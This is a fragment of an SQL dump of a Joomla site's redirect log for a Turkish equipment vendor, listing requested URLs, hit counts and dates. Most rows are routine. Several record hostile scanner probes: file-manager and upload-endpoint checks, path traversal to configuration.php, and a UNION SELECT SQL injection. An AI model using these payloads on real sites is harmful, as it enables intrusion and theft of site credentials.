00:00:00',301),(26413,'https://www.3s-technologies.com.tr/tr/templates/beez5/images/vm-preloader.gif',NULL,'https://www.3s-technologies.com.tr/templates/beez5/css/vmsite-ltr.css?vmver=6ee028ee','',22,0,'2021-02-08 13:30:22','0000-00-00 00:00:00',301),(26414,'http://3s-technologies.com.tr/tr/kcfinder/browse.php',NULL,'','',1,0,'2021-02-09 04:39:46','0000-00-00 00:00:00',301),(26415,'http://3s-technologies.com.tr/tr/assets/kcfinder/browse.php',NULL,'','',1,0,'2021-02-09 04:39:47','0000-00-00 00:00:00',301),(26416,'http://3s-technologies.com.tr/tr/admin/ckeditor/kcfinder/browse.php',NULL,'','',1,0,'2021-02-09 04:39:47','0000-00-00 00:00:00',301),(26417,'http://3s-technologies.com.tr/tr/admin/kcfinder/browse.php',NULL,'','',1,0,'2021-02-09 04:39:48','0000-00-00 00:00:00',301),(26418,'http://3s-technologies.com.tr/tr/js/kcfinder/browse.php',NULL,'','',1,0,'2021-02-09 04:39:48','0000-00-00 00:00:00',301),(26419,'http://3s-technologies.com.tr/tr/assets/ckeditor/kcfinder/browse.php',NULL,'','',1,0,'2021-02-09 04:39:48','0000-00-00 00:00:00',301),(26420,'http://3s-technologies.com.tr/tr/assets/js/kcfinder/browse.php',NULL,'','',1,0,'2021-02-09 04:39:49','0000-00-00 00:00:00',301),(26421,'http://3s-technologies.com.tr/tr/assets/admin/ckeditor/kcfinder/browse.php',NULL,'','',1,0,'2021-02-09 04:39:49','0000-00-00 00:00:00',301),(26422,'http://3s-technologies.com.tr/tr/ckeditor/kcfinder/browse.php',NULL,'','',1,0,'2021-02-09 04:39:50','0000-00-00 00:00:00',301),(26423,'http://3s-technologies.com.tr/tr/panel/kcfinder/browse.php',NULL,'','',1,0,'2021-02-09 04:39:50','0000-00-00 00:00:00',301),(26424,'https://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&itemid=55&lang=tr',NULL,'','',2,0,'2021-02-11 06:01:10','0000-00-00 00:00:00',301),(26425,'http://3s-technologies.com.tr/en/media/com_fabrik/css/package.css',NULL,'','',3,0,'2021-02-12 07:17:35','0000-00-00 00:00:00',301),(26426,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/tolo',NULL,'','',4,0,'2021-02-14 11:08:33','0000-00-00 00:00:00',301),(26427,'http://3s-technologies.com.tr/tr/community?foro=signup',NULL,'','',2,0,'2021-02-14 12:49:29','0000-00-00 00:00:00',301),(26428,'http://3s-technologies.com.tr/en/up.php',NULL,'','',51,0,'2021-02-14 17:29:35','0000-00-00 00:00:00',301),(26429,'http://www.3s-technologies.com.tr/tr/wood-processing-ahåÿap-iåÿleme',NULL,'','',3,0,'2021-02-14 19:30:06','0000-00-00 00:00:00',301),(26430,'http://www.3s-technologies.com.tr/tr/ahåÿap-iåÿleme-wood-processing-120cm',NULL,'','',4,0,'2021-02-14 23:29:58','0000-00-00 00:00:00',301),(26431,'http://www.3s-technologies.com.tr/tr/aluminyum-iåÿleme-aluminum-processing',NULL,'','',5,0,'2021-02-15 02:44:00','0000-00-00 00:00:00',301),(26432,'https://3s-technologies.com.tr/tr/js/admin.js',NULL,'https://3s-technologies.com.tr/js/admin.js','',1,0,'2021-02-15 17:07:21','0000-00-00 00:00:00',301),(26433,'https://3s-technologies.com.tr/tr/composer.json',NULL,'https://3s-technologies.com.tr/composer.json','',1,0,'2021-02-16 03:07:31','0000-00-00 00:00:00',301),(26434,'http://mail.3s-technologies.com.tr/tr/news',NULL,'','',10,0,'2021-02-17 10:10:52','0000-00-00 00:00:00',301),(26435,'http://www.3s-technologies.com.tr/tr/news',NULL,'','',12,0,'2021-02-20 21:34:19','0000-00-00 00:00:00',301),(26436,'http://www.3s-technologies.com.tr/tr/media/jui/js/jquery.min.js?4bd3af815a083cfc03cac2310611c955',NULL,'','',1,0,'2021-02-22 00:18:44','0000-00-00 00:00:00',301),(26437,'http://www.3s-technologies.com.tr/tr/media/jui/js/jquery-migrate.min.js?4bd3af815a083cfc03cac2310611c955',NULL,'','',1,0,'2021-02-22 00:18:44','0000-00-00 00:00:00',301),(26438,'http://www.3s-technologies.com.tr/tr/media/system/js/caption.js?4bd3af815a083cfc03cac2310611c955',NULL,'','',1,0,'2021-02-22 00:18:44','0000-00-00 00:00:00',301),(26439,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/vmsite.js?vmver=6ee028ee',NULL,'','',1,0,'2021-02-22 00:18:44','0000-00-00 00:00:00',301),(26440,'http://www.3s-technologies.com.tr/tr/media/system/js/mootools-core.js?4bd3af815a083cfc03cac2310611c955',NULL,'','',1,0,'2021-02-22 00:18:44','0000-00-00 00:00:00',301),(26441,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/vmprices.js?vmver=6ee028ee',NULL,'','',1,0,'2021-02-22 00:18:44','0000-00-00 00:00:00',301),(26442,'http://www.3s-technologies.com.tr/tr/media/system/js/mootools-more.js?4bd3af815a083cfc03cac2310611c955',NULL,'','',1,0,'2021-02-22 00:18:45','0000-00-00 00:00:00',301),(26443,'http://www.3s-technologies.com.tr/tr/media/system/js/core.js?4bd3af815a083cfc03cac2310611c955',NULL,'','',1,0,'2021-02-22 00:18:45','0000-00-00 00:00:00',301),(26444,'http://www.3s-technologies.com.tr/tr/templates/beez5/javascript/md_stylechanger.js',NULL,'','',1,0,'2021-02-22 00:18:45','0000-00-00 00:00:00',301),(26445,'http://www.3s-technologies.com.tr/tr/templates/beez5/javascript/hide.js',NULL,'','',1,0,'2021-02-22 00:18:45','0000-00-00 00:00:00',301),(26446,'http://www.3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/chosen.jquery.min.js?vmver=6ee028ee',NULL,'','',1,0,'2021-02-22 00:18:45','0000-00-00 00:00:00',301),(26447,'http://www.3s-technologies.com.tr/tr/modules/mod_virtuemart_cart/assets/js/update_cart.js?vmver=6ee028ee',NULL,'','',1,0,'2021-02-22 00:18:45','0000-00-00 00:00:00',301),(26448,'http://www.3s-technologies.com.tr/tr/media/djextensions/jquery-easing/jquery.easing.min.js',NULL,'','',1,0,'2021-02-22 00:18:46','0000-00-00 00:00:00',301),(26449,'http://www.3s-technologies.com.tr/tr/modules/mod_djimageslider/assets/js/slider.js?v=4.1.1',NULL,'','',1,0,'2021-02-22 00:18:46','0000-00-00 00:00:00',301),(26450,'http://www.3s-technologies.com.tr/tr/media/jui/js/jquery-noconflict.js?4bd3af815a083cfc03cac2310611c955',NULL,'','',1,0,'2021-02-22 00:18:51','0000-00-00 00:00:00',301),(26451,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_cwt_150x150.png',NULL,'','',2,0,'2021-02-23 23:11:14','0000-00-00 00:00:00',301),(26452,'https://3s-technologies.com.tr/tr/images/slideshow/80-sp18_av3.jpg',NULL,'','',4,0,'2021-02-24 02:45:14','0000-00-00 00:00:00',301),(26453,'http://3s-technologies.com.tr/tr/app_master/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2021-02-24 15:08:40','0000-00-00 00:00:00',301),(26454,'http://3s-technologies.com.tr/tr/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx',NULL,'','',7,0,'2021-02-24 15:08:48','0000-00-00 00:00:00',301),(26455,'http://3s-technologies.com.tr/tr/common/admin/jobs2/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2021-02-24 15:08:49','0000-00-00 00:00:00',301),(26456,'http://3s-technologies.com.tr/tr/dashboard/usercontrol/cms/page/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2021-02-24 15:08:49','0000-00-00 00:00:00',301),(26457,'http://3s-technologies.com.tr/tr/desktopmodules/news/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2021-02-24 15:08:49','0000-00-00 00:00:00',301),(26458,'http://3s-technologies.com.tr/tr/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx',NULL,'','',4,0,'2021-02-24 15:08:55','0000-00-00 00:00:00',301),(26459,'http://3s-technologies.com.tr/tr/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx',NULL,'','',4,0,'2021-02-24 15:09:01','0000-00-00 00:00:00',301),(26460,'http://3s-technologies.com.tr/tr/desktopmodules/tncomments/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2021-02-24 15:09:03','0000-00-00 00:00:00',301),(26461,'http://3s-technologies.com.tr/tr/desktopmodules/ya.controls/angularmain/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2021-02-24 15:09:04','0000-00-00 00:00:00',301),(26462,'http://3s-technologies.com.tr/tr/desktopmodules/base/editcontrols/telerik.web.ui.dialoghandler.aspx',NULL,'','',1,0,'2021-02-24 15:09:05','0000-00-00 00:00:00',301),(26463,'http://3s-technologies.com.tr/plugins/jplugin/j1plugin.php',NULL,'3s-technologies.com.tr','',2,0,'2021-02-26 14:29:51','0000-00-00 00:00:00',301),(26464,'http://3s-technologies.com.tr/templates/j3templates/j3templates.php',NULL,'3s-technologies.com.tr','',2,0,'2021-02-26 14:31:05','0000-00-00 00:00:00',301),(26465,'http://3s-technologies.com.tr/administrator/modules/mod_jmodule/mod_j1module.php',NULL,'3s-technologies.com.tr','',2,0,'2021-02-26 14:31:06','0000-00-00 00:00:00',301),(26466,'http://3s-technologies.com.tr/templates/j6templates/j6templates.php',NULL,'3s-technologies.com.tr','',2,0,'2021-02-26 14:31:21','0000-00-00 00:00:00',301),(26467,'http://3s-technologies.com.tr/administrator/templates/jtemplate/j1template.php',NULL,'3s-technologies.com.tr','',2,0,'2021-02-26 14:32:43','0000-00-00 00:00:00',301),(26468,'http://3s-technologies.com.tr/tr//downloader',NULL,'','',1,0,'2021-02-27 02:20:54','0000-00-00 00:00:00',301),(26469,'http://3s-technologies.com.tr/tr/community',NULL,'http://3s-technologies.com.tr/tr/community','',1,0,'2021-02-28 20:57:09','0000-00-00 00:00:00',301),(26470,'https://www.3s-technologies.com.tr/en/gsa-online.de',NULL,'https://www.3s-technologies.com.tr/gsa-online.de','',1,0,'2021-02-28 23:19:36','0000-00-00 00:00:00',301),(26471,'http://3s-technologies.com.tr/tr//checkout',NULL,'','',1,0,'2021-03-01 06:37:32','0000-00-00 00:00:00',301),(26472,'http://3s-technologies.com.tr/en/csrf.token',NULL,'','',1,0,'2021-03-04 01:51:44','0000-00-00 00:00:00',301),(26473,'http://www.3s-technologies.com.tr/en/system.paths',NULL,'','',1,0,'2021-03-04 01:51:47','0000-00-00 00:00:00',301),(26474,'http://www.3s-technologies.com.tr/en/csrf.token',NULL,'','',1,0,'2021-03-04 01:51:48','0000-00-00 00:00:00',301),(26475,'http://www.3s-technologies.com.tr/en/).addclass(',NULL,'','',1,0,'2021-03-04 01:51:50','0000-00-00 00:00:00',301),(26476,'http://www.3s-technologies.com.tr/en/).delay(500).slideup(500,',NULL,'','',1,0,'2021-03-04 01:51:56','0000-00-00 00:00:00',301),(26477,'http://3s-technologies.com.tr/en/img.caption',NULL,'','',1,0,'2021-03-04 01:51:59','0000-00-00 00:00:00',301),(26478,'http://3s-technologies.com.tr/en/).delay(500).slideup(500,',NULL,'','',1,0,'2021-03-04 01:52:01','0000-00-00 00:00:00',301),(26479,'http://3s-technologies.com.tr/en/).parents(',NULL,'','',1,0,'2021-03-04 01:52:08','0000-00-00 00:00:00',301),(26480,'http://3s-technologies.com.tr/en/).removeclass(',NULL,'','',1,0,'2021-03-04 01:52:09','0000-00-00 00:00:00',301),(26481,'http://www.3s-technologies.com.tr/en/).parents(',NULL,'','',1,0,'2021-03-04 01:52:13','0000-00-00 00:00:00',301),(26482,'http://www.3s-technologies.com.tr/en/).removeclass(',NULL,'','',1,0,'2021-03-04 01:52:17','0000-00-00 00:00:00',301),(26483,'http://3s-technologies.com.tr/en/).addclass(',NULL,'','',1,0,'2021-03-04 01:52:17','0000-00-00 00:00:00',301),(26484,'http://3s-technologies.com.tr/en/system.paths',NULL,'','',1,0,'2021-03-04 01:52:19','0000-00-00 00:00:00',301),(26485,'http://www.3s-technologies.com.tr/en/img.caption',NULL,'','',1,0,'2021-03-04 01:52:23','0000-00-00 00:00:00',301),(26486,'https://3s-technologies.com.tr/tr/_ignition/execute-solution',NULL,'https://3s-technologies.com.tr/_ignition/execute-solution','',1,0,'2021-03-06 14:56:23','0000-00-00 00:00:00',301),(26487,'http://3s-technologies.com.tr/tr//wp-content/db-cache.php',NULL,'www.google.com','',1,0,'2021-03-10 17:14:26','0000-00-00 00:00:00',301),(26488,'http://3s-technologies.com.tr/tr/wood-processing-ah',NULL,'','',6,0,'2021-03-11 04:09:48','0000-00-00 00:00:00',301),(26489,'http://3s-technologies.com.tr/tr/aluminyum-i',NULL,'','',6,0,'2021-03-11 04:09:49','0000-00-00 00:00:00',301),(26490,'http://3s-technologies.com.tr/tr/ah',NULL,'','',5,0,'2021-03-11 04:09:49','0000-00-00 00:00:00',301),(26491,'http://3s-technologies.com.tr/tr/akrilik-i',NULL,'','',7,0,'2021-03-11 04:09:52','0000-00-00 00:00:00',301),(26492,'http://3s-technologies.com.tr/tr/title',NULL,'','',1,0,'2021-03-11 04:09:53','0000-00-00 00:00:00',301),(26493,'http://3s-technologies.com.tr/tr/js/rokmage_tinymce/tinyupload.php',NULL,'','',1,0,'2021-03-12 22:59:59','0000-00-00 00:00:00',301),(26494,'http://3s-technologies.com.tr/tr/rokmage_tinymce/tinyupload.php',NULL,'','',1,0,'2021-03-12 23:00:01','0000-00-00 00:00:00',301),(26495,'http://3s-technologies.com.tr/js/rokmage_tinymce/tinyupload.php',NULL,'','',1,0,'2021-03-12 23:00:02','0000-00-00 00:00:00',301),(26496,'http://3s-technologies.com.tr/tr/media/rt-tinymce-uploads/blank.php?admin=saz',NULL,'','',2,0,'2021-03-12 23:00:04','0000-00-00 00:00:00',301),(26497,'http://3s-technologies.com.tr/rokmage_tinymce/tinyupload.php',NULL,'','',1,0,'2021-03-12 23:00:04','0000-00-00 00:00:00',301),(26498,'http://3s-technologies.com.tr/tr/wp-admin/upgrade.php',NULL,'','',20,0,'2021-03-14 07:58:28','0000-00-00 00:00:00',301),(26499,'http://3s-technologies.com.tr/en/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\" union select null,null,(select \"aowihfeaiohj\"),null,null,null,null,null-- aa',NULL,'','',1,0,'2021-03-16 18:53:25','0000-00-00 00:00:00',301),(26500,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,category_name?language=tr-tr',NULL,'','',1,0,'2021-03-16 20:13:15','0000-00-00 00:00:00',301),(26501,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,mf_name',NULL,'','',606,0,'2021-03-16 20:13:19','0000-00-00 00:00:00',301),(26502,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,mf_name/dirdesc',NULL,'','',601,0,'2021-03-16 20:13:22','0000-00-00 00:00:00',301),(26503,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,ordering',NULL,'','',598,0,'2021-03-16 20:13:36','0000-00-00 00:00:00',301),(26504,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,product_name',NULL,'','',603,0,'2021-03-16 20:13:45','0000-00-00 00:00:00',301),(26505,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hä±zlä±/by,product_name/dirdesc',NULL,'','',601,0,'2021-03-16 20:13:51','0000-00-00 00:00:00',301),(26506,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fä±rä±n?language=tr-tr',NULL,'','',1,0,'2021-03-16 20:14:04','0000-00-00 00:00:00',301),(26507,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±',NULL,'','',643,0,'2021-03-16 20:14:09','0000-00-00 00:00:00',301),(26508,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/by,`p`.product_sku',NULL,'','',627,0,'2021-03-16 20:14:15','0000-00-00 00:00:00',301),(26509,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/by,`p`.product_sku/dirdesc',NULL,'','',651,0,'2021-03-16 20:14:19','0000-00-00 00:00:00',301),(26510,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/by,category_name',NULL,'','',618,0,'2021-03-16 20:14:33','0000-00-00 00:00:00',301),(26511,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/by,category_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2021-03-16 20:14:37','0000-00-00 00:00:00',301),(26512,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/by,mf_name',NULL,'','',596,0,'2021-03-16 20:14:45','0000-00-00 00:00:00',301),(26513,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/by,mf_name/dirdesc',NULL,'','',594,0,'2021-03-16 20:14:49','0000-00-00 00:00:00',301),(26514,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/by,ordering',NULL,'','',600,0,'2021-03-16 20:15:02','0000-00-00 00:00:00',301),(26515,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/by,product_name',NULL,'','',600,0,'2021-03-16 20:15:10','0000-00-00 00:00:00',301),(26516,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/by,product_name/dirdesc',NULL,'','',597,0,'2021-03-16 20:15:15','0000-00-00 00:00:00',301),(26517,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/by,product_sku',NULL,'','',624,0,'2021-03-16 20:15:23','0000-00-00 00:00:00',301),(26518,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-dã¼åã¼k-hä±zlä±/le-40v-detail/askquestion?tmpl=component',NULL,'','',310,0,'2021-03-16 20:15:36','0000-00-00 00:00:00',301),(26519,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/by,`p`.product_sku',NULL,'','',649,0,'2021-03-16 20:15:46','0000-00-00 00:00:00',301),(26520,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/by,`p`.product_sku/dirdesc',NULL,'','',642,0,'2021-03-16 20:15:52','0000-00-00 00:00:00',301),(26521,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/by,category_name',NULL,'','',648,0,'2021-03-16 20:16:14','0000-00-00 00:00:00',301),(26522,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/by,category_name/dirdesc',NULL,'','',643,0,'2021-03-16 20:16:25','0000-00-00 00:00:00',301),(26523,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/by,mf_name',NULL,'','',613,0,'2021-03-16 20:16:44','0000-00-00 00:00:00',301),(26524,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/by,mf_name/dirdesc',NULL,'','',630,0,'2021-03-16 20:16:48','0000-00-00 00:00:00',301),(26525,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/by,ordering',NULL,'','',634,0,'2021-03-16 20:17:15','0000-00-00 00:00:00',301),(26526,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/by,product_name',NULL,'','',619,0,'2021-03-16 20:17:25','0000-00-00 00:00:00',301),(26527,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/by,product_name/dirdesc',NULL,'','',600,0,'2021-03-16 20:17:35','0000-00-00 00:00:00',301),(26528,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/by,product_sku',NULL,'','',598,0,'2021-03-16 20:18:01','0000-00-00 00:00:00',301),(26529,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-fä±rä±n/dirdesc',NULL,'','',587,0,'2021-03-16 20:18:10','0000-00-00 00:00:00',301),(26530,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/am100-detail/askquestion?tmpl=component',NULL,'','',299,0,'2021-03-16 20:18:16','0000-00-00 00:00:00',301),(26531,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',1,0,'2021-03-16 20:18:28','0000-00-00 00:00:00',301),(26532,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2021-03-16 20:18:36','0000-00-00 00:00:00',301),(26533,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/by,category_name/dirdesc',NULL,'','',587,0,'2021-03-16 20:18:44','0000-00-00 00:00:00',301),(26534,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,category_name/dirdesc',NULL,'','',575,0,'2021-03-16 20:19:05','0000-00-00 00:00:00',301),(26535,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2021-03-16 20:19:14','0000-00-00 00:00:00',301),(26536,'https://3s-technologies.com.tr/index.php/tr/ueruenler/ã§ubuk-lehim/by,mf_name?language=tr-tr',NULL,'','',1,0,'2021-03-16 20:19:23','0000-00-00 00:00:00',301),(26537,'https://3s-technologies.com.tr/index.php/en/products/bã¶lgesel-lehimleme?language=en-gb',NULL,'','',3,0,'2021-03-16 20:28:55','0000-00-00 00:00:00',301),(26538,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2021-03-16 20:29:06','0000-00-00 00:00:00',301),(26539,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,category_name?language=en-gb',NULL,'','',1,0,'2021-03-16 20:29:14','0000-00-00 00:00:00',301),(26540,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,mf_name',NULL,'','',582,0,'2021-03-16 20:29:19','0000-00-00 00:00:00',301),(26541,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,mf_name/dirdesc',NULL,'','',583,0,'2021-03-16 20:29:26','0000-00-00 00:00:00',301),(26542,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,ordering',NULL,'','',587,0,'2021-03-16 20:29:44','0000-00-00 00:00:00',301),(26543,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,product_name',NULL,'','',579,0,'2021-03-16 20:29:52','0000-00-00 00:00:00',301),(26544,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,product_name/dirdesc',NULL,'','',577,0,'2021-03-16 20:29:56','0000-00-00 00:00:00',301),(26545,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/by,product_sku',NULL,'','',565,0,'2021-03-16 20:30:07','0000-00-00 00:00:00',301),(26546,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n/dirdesc',NULL,'','',556,0,'2021-03-16 20:30:15','0000-00-00 00:00:00',301),(26547,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fä±rä±n?language=en-gb',NULL,'','',1,0,'2021-03-16 20:30:30','0000-00-00 00:00:00',301),(26548,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±',NULL,'','',567,0,'2021-03-16 20:30:36','0000-00-00 00:00:00',301),(26549,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±/by,`p`.product_sku',NULL,'','',565,0,'2021-03-16 20:30:43','0000-00-00 00:00:00',301),(26550,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±/by,`p`.product_sku/dirdesc',NULL,'','',576,0,'2021-03-16 20:30:52','0000-00-00 00:00:00',301),(26551,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±/by,category_name',NULL,'','',570,0,'2021-03-16 20:31:18','0000-00-00 00:00:00',301),(26552,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±/by,category_name/dirdesc',NULL,'','',584,0,'2021-03-16 20:31:25','0000-00-00 00:00:00',301),(26553,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±/by,mf_name',NULL,'','',564,0,'2021-03-16 20:31:56','0000-00-00 00:00:00',301),(26554,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±/by,mf_name/dirdesc',NULL,'','',564,0,'2021-03-16 20:32:03','0000-00-00 00:00:00',301),(26555,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±/by,ordering',NULL,'','',565,0,'2021-03-16 20:32:21','0000-00-00 00:00:00',301),(26556,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hä±zlä±/by,product_name',NULL,'','',557,0,'2021-03-16 20:32:31','0000-00-00 00:00:00',301),(26557,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/dirdesc?language=tr-tr',NULL,'','',1,0,'2021-03-16 20:45:54','0000-00-00 00:00:00',301),(26558,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/mx200lp-detail',NULL,'','',319,0,'2021-03-16 20:46:04','0000-00-00 00:00:00',301),(26559,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±/mx200lp-detail/askquestion?tmpl=component',NULL,'','',317,0,'2021-03-16 20:46:13','0000-00-00 00:00:00',301),(26560,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hä±zlä±?language=tr-tr',NULL,'','',1,0,'2021-03-16 20:46:21','0000-00-00 00:00:00',301),(26561,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z',NULL,'','',608,0,'2021-03-16 20:46:29','0000-00-00 00:00:00',301),(26562,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/by,`p`.product_sku',NULL,'','',623,0,'2021-03-16 20:46:40','0000-00-00 00:00:00',301),(26563,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/by,`p`.product_sku/dirdesc',NULL,'','',627,0,'2021-03-16 20:46:54','0000-00-00 00:00:00',301),(26564,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hä±z/by,product_sku',NULL,'','',765,0,'2021-03-16 20:47:09','0000-00-00 00:00:00',301),(26565,'https://3s-technologies.com.tr/tr/?option=com_jdownloads&itemid=0&view=upload',NULL,'','',8,0,'2021-03-16 22:30:42','0000-00-00 00:00:00',301),(26566,'https://3s-technologies.com.tr/tr/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../vuln.php',NULL,'','',6,0,'2021-03-16 22:30:47','0000-00-00 00:00:00',301),(26567,'http://3s-technologies.com.tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=vuln.php',NULL,'','',2,0,'2021-03-16 22:30:49','0000-00-00 00:00:00',301),(26568,'http://3s-technologies.com.tr/tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/tmp-upload-images/vuln.php',NULL,'','',3,0,'2021-03-16 22:30:50','0000-00-00 00:00:00',301),(26569,'https://3s-technologies.com.tr/tr/?option=com_jwallpapers&task=upload',NULL,'','',3,0,'2021-03-16 22:30:52','0000-00-00 00:00:00',301),(26570,'http://3s-technologies.com.tr/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=vuln.php',NULL,'','',2,0,'2021-03-16 22:30:54','0000-00-00 00:00:00',301),(26571,'https://3s-technologies.com.tr/tr/?option=com_myblog&task=ajaxupload',NULL,'','',9,0,'2021-03-16 22:31:09','0000-00-00 00:00:00',301),(26572,'https://3s-technologies.com.tr/tr/?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',19,0,'2021-03-16 22:31:11','0000-00-00 00:00:00',301),(26573,'https://3s-technologies.com.tr/tr/?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',6,0,'2021-03-16 22:31:15','0000-00-00 00:00:00',301),(26574,'https://3s-technologies.com.tr/tr/?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',7,0,'2021-03-16 22:31:18','0000-00-00 00:00:00',301),(26575,'https://3s-technologies.com.tr/tr/?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',7,0,'2021-03-16 22:31:23','0000-00-00 00:00:00',301),(26576,'https://3s-technologies.com.tr/tr/?option=com_macgallery&view=download&albumid=../../configuration.php',NULL,'','',7,0,'2021-03-16 22:31:25','0000-00-00 00:00:00',301),(26577,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hä±z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2021-03-17 05:07:40','0000-00-00 